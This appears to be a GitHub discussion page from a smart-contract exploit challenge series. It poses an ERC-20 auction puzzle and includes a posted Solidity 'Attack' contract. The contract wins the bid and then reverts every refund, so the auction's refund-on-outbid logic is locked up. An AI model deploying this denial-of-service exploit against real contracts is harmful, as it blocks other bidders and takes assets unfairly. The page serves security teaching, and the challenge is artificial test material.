Auction #9
passandscore
started this conversation in
Exploits
Replies: 1 comment 1 reply
-
My SolutionAs an attacker, you would want to be early on this as you are going to be the highest bidder. contract Attack {
TestToken testToken;
constructor(address target){
testToken = TestToken(target);
}
// Ensure that the bid is 1 wei > getHighestBidder()
function performAttack() public payable {
testToken.makeBid{value : msg.value}();
}
fallback() external payable {
haltContract();
}
receive() external payable {
haltContract();
}
function haltContract() internal pure {
revert();
}
} |
Beta Was this translation helpful? Give feedback.
1 reply
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
-
Auction
Create a contract that can be used to exploit the bidding mechanism of a smart contract.
The smart contract is acts as an ERC-20 token with a few extra features to simulate an auction. In particular, the entire initial distribution is given out to the account that has the highest bid at the end of the auction period. In this case, the Auction Period is set when the contract is deployed and is defined as the timestamp when the contract is deployed plus 604800 seconds (1 week);
When a user makes a bid, if it is higher than the previous bid, the user's address is recorded, the bid is accepted (funds sent), a record for the highest bid is updated and the previous highest bid is returned to the address for that user.
Your job is to create an attack contract that will disrupt the process and ensure the attacker has the highest bid.
Author: scadamsuab
Beta Was this translation helpful? Give feedback.
All reactions